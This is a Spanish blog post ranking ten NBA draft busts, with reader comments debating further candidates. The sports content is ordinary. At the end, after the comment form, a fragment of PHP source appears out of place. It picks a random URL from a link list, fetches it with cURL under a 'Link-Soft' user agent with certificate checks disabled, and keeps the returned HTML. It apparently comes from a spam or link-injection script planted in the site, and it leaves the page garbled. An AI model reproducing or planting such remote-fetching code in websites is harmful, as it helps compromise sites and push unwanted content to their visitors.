Los grandes fracasos de la historia del Draft

27 de April de 2010 por Sergio

Ahora que se acerca el final de temporada, y hemos hablado de la temporada de la NCAA que acaba de terminar, me gustaría hacer un repaso histórico a aquellos jugadores que llegaron a la liga profesional con altas expectativas de triunfar, y no demostraron, ni lejanamente, todo ese potencial que se adivinaba en su etapa universitaria o de instituto.

¿Quien será el equipo que escoja a Bowie o Oden antes que a Jordan o Durant? Yo desde luego voto por Portland. Kevin Pritchard…. te vigilo.

10. Jay Williams

Empezamos con un caso particular. Es el único caso de la lista que no se puede catalogar como fracaso, si no como mala suerte. Fue jugador universitario del año en la NCAA en año anterior a su entrada en la competición. Quizás era el jugador con más talento de su generación pues el único jugador que lo precedió en el draft fue Yao Ming. En un principio pareció demostrar sus aptitudes en esa primera y única temporada con los Bulls, alcanzando unos promedios de 9.5 puntos y 4,7 asistencias en 26 minutos. Antes de comenzar su año de sophomore, y al volver de impartir una charla a unos jóvenes, tuvo un accidente con una moto de gran cilindrada (vehículos prohibidos por la mayoría de equipos en deportes profesionales ) sin poseer licencia y se fracturó la pelvis y los ligamentos de la rodilla a la vez que se dañaba los nervios de su rodilla. A pesar de que un principio se planteó la amputación de la pierna del joven jugador, se recuperó satisfactoriamente. Sin embargo, nunca pudo volver al nivel de juego de antes del incidente, quedando relegado a intentar jugar en competiciones menores como la liga China o la Development League, siendo cortado en ambas a las primeras de cambio.

Jugadores elegidos posteriormente en ese draft: Amare Stoudamire, Caron Butler, Tayshaun Prince.

9. Nikoloz Tskitishvili

Este jugador georgiano perteneció al mismo draft de 2002 que Jay Williams, uno de los draft con menor nivel de la historia del baloncesto americano (DaJuan Wagner, Mike Dunleavy Jr., Chris Wilcox,…). En un principio, un jugador europeo (entonces Europa empezaba a brillar como cantera con Nowitzki o Gasol) de 2,12 y que jugaba de ala-pívot era un diamante en bruto que la mayor liga del mundo no podía dejar escapar. Grave error. En sus cuatro temporadas en la NBA jugó para cinco equipos  un total de 172 partidos con unos promedios de 11,3 minutos, 2,9 puntos y 1,8 puntos con unos irrisorios porcentajes de 30,4% en tiros de campo y 23,5 en triples. Posteriormente jugaría para equipos españoles como Fuenlabrada y CajaSol. Sin duda, unos números muy dignos para un nº5 del draft…

Jugadores elegidos posteriormente en ese draft: mismos jugadores que el anterior.

8. Dennis Hopson

Elegido en el nº3 del draft de 1987 por New Jersey, delante de Hall of Famers como Pippen y Kevin Johnson, venía de ser el máximo anotador de la historia de una universidad de la solera de Ohio State, con promedios de 29 puntos por partido. En sus 6 temporadas como profesional, tan solo en la temporada 89-90 alcanzó unos guarismos decentes para un jugador de su proyección. Es curioso que consiguiera un anillo de campeón con los Bulls en la temporada 90-91. Eso sí, con unos promedios de 4,3 puntos y 1,8 rebotes en la regular… Trase ser cortado por los Kings al año siguiente, se marcharía al CAI Zaragoza, donde tampoco pudo demostrar su valía, finalizando su carrera en las ligas de Filipinas e Israel.

Jugadores elegidos posteriormente en ese draft: Scottie Pippen, Kevin Johson, Brian Grant, Reggie Miller, Mark Jackson

7. Kent Benson

Ahora que hemos hablado mucho de la Universidad de Butler y sus similitudes con otro histórico equipo que protagonizó la, quizás, mejor película sobre baloncesto de la historia: los Hoosiers de Indiana, es lógico hablar del jugador que lideró a aquel equipo a la consecución de un título de la NCAA y fue elegido durante dos años All-American. Quizás haya pasado a la historia por ser la causa del traspaso de Larry Bird de la universidad de Indiana a la de Indiana State. Fue elegido en la primera posición del draft de 1977 por los Milwaukee Bucks, y promedió durante sus 11 campañas 9,1 puntos y 5,7 rebotes en 23 minutos de juego.

Aunque tuvo dos decentes temporadas militando en los Pistons, su impacto en la liga no fue en absoluto el esperado para todo un número 1 del draft.

Jugadores elegidos posteriormente en ese draft: Otis Birdsong, Marques Johnson, Walter Davis, Bernard King (todos ellos All-Stars)

6. Darko Milicic

Quizás sea suficiente con decir que fue el nº2 de uno de los drafts con mayor calidad de la historia. En su juventud demostró un potencial impresionante en el baloncesto europeo, conquistando el Mundial cadete y alcanzando grandes estadísticas en la Euroliga a sus 17 años, demostrando una superioridad insultante en su generación, al estilo del más reciente Ricky Rubio. Los Pistons no dudaron de su capacidad y lo eligieron por delante de jugadores como Wade o Anthony aquel año. Pero claro, Larry Brown, el entrenador del equipo aquel año, nunca ha sido dado a dar oportunidades a los jóvenes jugadores que ha ido adquiriendo a lo largo de su trayectoria, por lo que remitió al jugador a los minutos de la basura durante sus dos primeras temporadas en la NBA. Aunque haya alcanzado logros como el anillo de campeón de 2004 con el equipo de Michigan y posea el récord de ser el jugador más joven en haber participado en una Final de la NBA, podemos decir que dichas marcas son totalmente anecdóticas para un jugador que jamás ha tenido un impacto significativo en la competición. Su lengua demasiado larga y su falta de compromiso tampoco han ayudado a que los sucesivos equipos para los que ha jugado confíen demasiado en él. Son muy recordadas las declaraciones que realizó sobre los arbitros al final de la participación del combinado de Serbia en el Eurobasket de 2007.

Jugadores elegidos posteriormente en ese draft: Carmelo Anthony, Dwayne Wade, Chris Bosh, Chris Kaman, David West, Josh Howard y Mo Williams.

5. Sam Bowie

Quizás la elección de draft más famosa de la historia, y no por su acierto precisamente…. A pesar de que la elección de Portland por delante de Michael Jordan ese año esta considerado el mayor error de la historia de esta franquicia “gafe” en el sorteo universitario, no vamos a meter el dedo en la llaga más de lo necesario. La verdad es que los números que alcanzó durante su etapa pre-profesional eran de auténtica estrella: 28 puntos y 18 rebotes por partido. El problema que vivió durante su corta trayectoria fue en forma de continuas lesiones, lastrando continuamente su progresión. A partir de su traspaso a los Nets pudo demostrar su potencial con unos promedios durante esos años de 12,8 puntos y 8,2 rebotes en algo menos de 30 minutos por partido.

Jugadores elegidos posteriormente en ese draft: Michael Jordan, Charles Barkley, John Stockton, Kevin Willis.

4. Chris Washburn

Llamado a ser el siguiente Karl Malone por su increíble poderío físico, lo situamos tan arriba en la lista por el motivo que propició su fracaso: las drogas. A pesar de que no tuvo tan mala suerte con este tema como el malogrado Len Bias, el final de su experiencia profesional vino de la forma más humillante posible: fue expulsado de la competición por no pasar 3 controles antidrogas consecutivos. Ese jugador que maravilló en su etapa universitaria al lado de Spudd Webb con sus 2,11 y su magnífica coordinación, nunca llegaría a demostrar lo que pudo haber sido, promediando en 72 partidos disputados sólo 2,4 puntos y 2,2 rebotes por partido.

Jugadores elegidos posteriormente en ese draft: Chuck Person, Dennis Rodman, Kevin Duckworth, Mark Price, Arvydas Sabonis, Ron Harper

3. Kwame Brown

Otro número uno del draft que nunca ha dado la talla. Este caso quizás nos conscierne más por pertenecer al draft de nuestro Pau. Quizás no este más alto en la lista porque las otra opciones de pívots en aquel draft fueron Chandler y Curry, otros dos sonados fracasos (no olvidemos que Gasol llegó a la liga como un forward versátil), y porque todavía es un jugador en activo. De la elección de los Wizards ese año se encargaba Michael Jordan. Este tomo el riesgo de elegir por primera vez en la historia a un nº1 del Draft directamente desde el instituto, donde maravilló a propios y extraños con unas estadísticas espectaculares. Aparte de su nula aportación baloncestística a los diferentes equipos en los que ha militado, también ha sido noticia por otros motivos como conducir en sentido contrario, violación y un curioso incidente lanzando una tarta de cumpleaños a un peatón. Sus promedios hasta ahora son de 6,7 puntos y 5,4 rebotes en 22 minutos, con su ya famosa “clase” para el lanzamiento de tiros libres, empeorando gradualmente cada año.

Jugadores elegidos posteriormente en ese draft: Pau Gasol, Joe Johnson, Zach Randolph, Gerald Wallace, Tony Parker, Gilbert Arenas, Mehmet Okur.

2. Olowokandi

“Kandi Man” tiene el dudoso honor de ser el número 1 de uno de los drafts con más clase de los últimos 15 años. Su dominio del baloncesto universitario en la Universidad del Pacífico (22 puntos, 11,2 rebotes y 3 tapones por partido) no hacía presagiar en absoluto su más que discreta actuación en las 9 temporadas que disputó en la NBA, con unos promedios de 8,3 puntos y 6,8 rebotes a lo largo de su carrera. Sólo rindió debidamente en el año que terminaba su contrato, ejemplificando el tipo de jugador que suele entrar en la liga por dinero antes que por la competitividad. Lo ponemos en 2º lugar por su, entonces, evidente potencial, no desarrollado por su mala cabeza y por las elecciones que dejaron pasar ese año los Clippers.

Jugadores elegidos posteriormente en ese draft: Vince Carter, Antawn Jamison, Dirk Nowitzki, Paul Pierce, Rashard Lewis, Brad Miller.

1. LaRue Martin

En 1972, una moneda decidió que la elección del número uno del draft de ese año recayera en los Portland TrailBlazers. El equipo eligió a este prometedor pívot de 2,11, escogiendo  posteriormente los Buffalo Braves a Bob McAdoo (punto para ellos). Desde el instituto, y gracias a su espectacular desarrollo físico, los ojeadores de las diferentes franquicias de la NBA clavaron sus ojos en este jugador, llegando a decir que podría haber jugado directamente en la liga sin pasar por la universidad. A pesar de que LaRue no se precipitó y jugó durante varias temporadas en la Universidad de Loyola, obteniendo los premios de All-American y el récord de rebotes de la NCAA, la presión que hubo de soportar tras su elección pudo con él y constituyó la más sonada decepción hasta entonces para un jugador del draft. Tras sólo 4 temporadas en la NBA, se retiró a los 25 años con unas marcas de 5,3 puntos y 4,6 rebotes. Lo sitúo en el nº1 de la lista por que los fracasos en aquellos tiempos de sorteos universitarios eran muy raros y por ser un caso más desconocido que el resto.

Jugadores elegidos posteriormente en ese draft: Bob McAdoo, Julius Erving, Jim Price

También merecen una mención especial jugadores como: Robert Traylor. Jonhatan Bender, Ed O’Bannon, Pervis Ellison, Danny Ferry, Ken Durrett, Marcus Fizer y hasta nuestro Fran Vazquez.

Comenta

15 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    No me parece bien incluir a Jay Williams aquí. Conceptualmente no encuentro demasiadas diferencias entre su drama o el de Bias.

      Citar

  2. rojorob dice:
    #2

    Pues Jonathan Bender en el NBA live era cojonudo.

      Citar

  3. Viva_Dirk dice:
    #3

    Bien reciente tenemos a Adam Morrison, aunque quizá con algo de suerte le veamos jugando bien en Europa. De los que nombras al final, creo que Pervis Ellison es también un fracaso digno de estar en la lista.

      Citar

  4. sergio dice:
    #4

    Deer, en el artículo pongo que más que un caso de fracaso, es un caso de mala suerte por una imprudencia suya. Son capítulos tristes, pero ha tenido la suerte de volver a competir, algo que nunca pudo hacer Bias. Por desgracia no ha sido el mismo ni de lejos.

    He hecho la lista basandome en un criterio personal y contrastando informaciones de especialistas sobre la materia. He intentado poner ejemplos de todos los tipos de fiascos posibles: salto prematuro, falta de confianza de entrenadores, adicciones, desgracias, falta de seguridad en si mismos, casos inexplicables,…. Supongo que cada uno haría una lista diferente, pero de eso se trata….

      Citar

  5. Hynreck dice:
    #5

    Jeje, molan estos posts mucho.

    Estoy con Viva, Morrison merece aparecer aqui

      Citar

  6. sergio dice:
    #6

    Como esta en activo le daremos un margen de confianza. Lo mismo le pasa a Joe Alexander o Shelden Williams por ejemplo…

      Citar

  7. Love Denise dice:
    #7

    ademas de los nombrados y Bigote Morrison,en los ultimos años destacan Ike Diogu (9) , PatricK o’Bryant (9), Araujo (8), Luke Jackson (10), Robert Swift (12), Sweetney (9), Wagner (6)

      Citar

  8. max dice:
    #8

    Pues en su primer año Morrison no lo hizo del todo mal, acabó con 11.8 ptos, 2.9 rebotes y 2.1 asistencias y fue una vez rookie del mes. Cierto que a partir de ahí empezó una cuesta abajo que parece no tener fin….

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    ¿¿¿Shelden Williams; nº 5 de no sé que draft??

      Citar

  10. kantonyo dice:
    #10

    Williams fue elegido en el puesto 5º por Atlanta en 2006 despues de un gran rendimiento en Duke, donde batió unos cuantos records.

      Citar

  11. Txusma dice:
    #11

    Y creo recordar que Shelden Williams tb cuajó una buena primera temporada. Después los Hawks ficharon a Horford y Williams pasó al más completo ostracismo.
    En otro post alguien comentaba que a veces no se trata de acertar o no sino de gestionar y realmente formar a tus elecciones. Realmente Williams no sirve para nada más que para los minutos de la basura?
    Y recordemos que Morrison se lesionó de gravedad el segundo año. Y después de una primera temporada no tan buena como se esperaba, eso le acabó de matar.

      Citar

  12. max dice:
    #12

    Shelden Williams fue el tercer jugador en toda la historia de la NCAA en conseguir 1500 ptos., 1000 rebotes, 350 tapones y 150 robos (los dos anteriores fueron Tim Duncan y Ralph Sampson); por lo que la elección por parte de Atlanta parecia del todo acertada. A partir de ahí, a mi también me sorprende que sólo juegue lo que juega y que no triunfe en ningún equipo.

      Citar

  13. LEmontus dice:
    #13

    Muy bueno el arttículo y muy interesante. El tema de como jugadores que destacan en la NCAA luego son un bluff se explica dando tres aspectos al menos desde mi punto de vista:

    Cabeza, jugadores que prefieren todo menos jugar que por mucho talento que tengan siempre acaban mal.

    Físico el salto de categoría es muy grande y no es lo mismo pegarte con un don nadie que con B. Wallace por ejemplo.

    Lesiones , esto se carga a muchos jugadores.

      Citar

  14. Sekeer94 dice:
    #14

    Yo pondria al nº2 del draft de 2009 Haseem Thabet se que es muy pronto pero al paso que va harden evans ricky curry jennigs lawson y holiday son mucho mejores

      Citar

  15. carlos v dice:
    #15

    HAY UN JUGADOR QUE SE LLAMA ERICK GRAY DE NY. PROMEDIA 43.3 PTS, 6 ASISTENCIAS Y 5 REBOTES POR PARTIDO EN HIGH SCHOOL Y TIENEN 16 AÑOS. ES UN PUESTO 2 DE 1.96. ADIOS A JORDAN Y A JAMES. LO QUIERE GOLDEN STATE

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>